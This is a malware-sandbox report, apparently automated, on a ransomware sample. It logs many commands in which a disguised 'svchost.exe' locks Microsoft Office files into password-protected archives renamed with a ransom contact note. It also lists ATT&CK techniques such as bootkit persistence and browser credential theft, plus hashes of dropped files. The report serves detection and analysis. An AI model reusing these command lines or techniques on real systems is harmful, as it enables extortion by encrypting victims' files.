  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1220
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2144
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2284
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1700
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2204
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2128
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1192
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2616
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.Xml.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.Xml.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.SharePoint.BusinessData.Administration.Client.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.SharePoint.BusinessData.Administration.Client.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\OCRHC.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\OCRHC.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\OCRVC.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\OCRVC.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2504
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\OLKIRM.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\OLKIRM.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2812
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\OLKIRMV.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\OLKIRMV.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:448
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote-PipelineConfig.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote-PipelineConfig.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2212
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEIRM.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEIRM.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe

Filesize
123KB

MD5
800a1ae7ac58138118975bfa7042907b

SHA1
ff0fb175cae1fdb2771246d431559b44fdcc3691

SHA256
a92bffdf3e2d29009ff965cf45035cf9f4f0265d96b8b8e293a3bf29c60d6950

SHA512
629fbbbd495b2cdfe41a838dbd7781c9350eb7641d264398b4f53f9c6af68f3fbae6ecf6b5b7f1f4efae8d407d1f9ce7a98d8a9e15568db88e5d2c770e4df782

Download Submit
C:\Windows\SysWOW64\NoSafeMode.dll

Filesize
12KB

MD5
6bb3bca23fdff5b013863d8423267251

SHA1
2e6b80241d1a9269cc30e13663e6f910a0893450

SHA256
bdb1a0b687ced575e71702b7b4554063e697791bc2b2a286a0e4dfd528739670

SHA512
de6230dfe87df4840314983573c94ce332f5bfe9996de852c6e47844e785a4e7a8e4084a6d9ed1fd4aac78b896d2158a201ff202635c205bf50e2507c1165478

Download Submit
C:\Windows\SysWOW64\cfwin32.dll

Filesize
394KB

MD5
53894890dc01bbcace449f6590a1597b

SHA1
b27c93ef650d79a49150e61cd668b01bee543a30

SHA256
2f3f037b07737101076f50664ea3af10f76970febdcba4bd0e38d5a0eca4f6dd

SHA512
2ab1d894688ba8ee4129c575a116e7d01840d553a3956c3c158921e0794207ae9d0396c4c848c9e6592f40466e893ed19165e5eb34c53e02fe19fb65265c3a5a

Download Submit
C:\Windows\SysWOW64\csrss32.dll

Filesize
167KB

MD5
1ccda7a99f4552d258663a1dea54a07e

SHA1
b761408d4403ea07261cceb5a8afe789c4fc2c19

SHA256
098cccfa11432f742591078ab41571efa5e325c327a0f9797da385e48da09615

SHA512
f8e4c689608206cd0c5ccf9a36533ea74da7008a21e159ef7ebd199fd63a54c3a86f6842afefb282e5ebf1124664098d52b2acdcca53027d83d42248c2204b1e

Download Submit
C:\Windows\SysWOW64\csrss64.dll

Filesize
175KB

MD5
e42494d05a95f296bc38bedef3cba905

SHA1
aca3e577a7c8a40f6eb9aef1aa7573214853a723

SHA256
7d13d63c817ccdf3817b4d06bd20035535f238980d1b7b110713576dee97834e

SHA512
0fffff443a9c12e80b8af7caa4763fde76158c45cffc62f3d0773399b08592ddeae95d5ffb688ddbb29d5a08a3aadade0121f51aea3742cdc248dd45def14ce1

Download Submit
C:\Windows\SysWOW64\default2.sfx

Filesize
92KB

MD5
94059cc33eba96910993e644a55a1655

SHA1
c6c6ba99e43aa09a5bad6345a20b4dc530589862

SHA256
72af31e06d948f50fdc95526653bbad591b869e4542fc8fbb654ca49a2fd3574

SHA512
80048eb4b40b3e26a68af736bb8c7a459239763f69ed8f9e36bd243c1eed7c20901adaecf16bc993af0fbb2e35ae32bc0a13cc40329db42c251c05411a6aea5e

Download Submit
C:\Windows\SysWOW64\svschost.exe

Filesize
34KB

MD5
60a87ec2fcea72cb0e254f8fd36c5006

SHA1
0b1dde47b736150a4e8338e65e48bb0a6ebf9c4b

SHA256
ba179f357218285c4518f792f1736ec0ee831c85298998a184ac4a1c6145eb7e

SHA512
7d5f64e6dc90e21bb4d6fc7d4c229622334bc8c0662b9227fe893286d373655c6c2664aa01648bc796383b80d225ad4038208db48e7fb796cc911b4093ff895d

Download Submit
C:\Windows\SysWOW64\uwnmspwks.rrr

Filesize
4KB

MD5
d09d26d4e541950771ea70009953d910

SHA1
99d1f9939e15f604694b4927bcd93d76f9dcd845

SHA256
0e36ff6acc0e2522e1066f6ca1c659eeb1948da69e8bfef7405588aaff1f6389

SHA512
